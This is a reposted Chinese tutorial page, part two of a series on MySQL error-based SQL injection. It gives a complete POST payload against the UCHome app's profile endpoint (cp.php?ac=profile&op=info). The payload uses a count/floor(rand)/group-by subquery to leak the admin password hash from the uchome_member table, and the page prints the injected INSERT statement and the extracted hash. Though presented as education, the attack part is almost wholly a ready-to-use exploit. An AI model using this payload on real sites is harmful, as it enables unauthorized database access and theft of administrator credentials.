网站地图    收藏   

主页 > 后端 > 网站安全 >

mysql暴错注入的科普 2 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 通过前面SQL错误信息获得了表前缀,那么直接就可以爆用户名为admin的hash向cp.php?ac=profileop=info POST提交参数:profilesubmit=1formhash=232d1c54info[a#39;,(select 1 from(select count(*),conca......

通过前面SQL错误信息获得了表前缀,那么直接就可以爆用户名为admin的hash

向cp.php?ac=profile&op=info POST提交参数:
profilesubmit=1&formhash=232d1c54&info[a',(select 1 from(select count(*),concat((SELECT concat(password) FROM uchome_member where username like 'admin%'),floor(rand(0)*2))x from information_schema.tables group by x)a),'1')#]=1


SQL语句是:
INSERT INTO uchome_spaceinfo (uid,type,subtype,title,friend) VALUES ('3','info','',(select 1 from(select count(*),concat((SELECT concat(password) FROM uchome_member where username like 'admin%'),floor(rand(0)*2))x from information_schema.tables group by x)a),'1')#','1','0')

得到Adminhash6ad9ab1e6a74f51b57079c97329d208c,最后一位是group_key,去掉最后一位1,最后一位是group_key.

 

from:RAyh4c的黑盒子

mysql暴错注入的科普 1 http://www.2cto.com/Article/201108/100722.html
mysql暴错注入的科普 3 http://www.2cto.com/Article/201108/100724.html

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论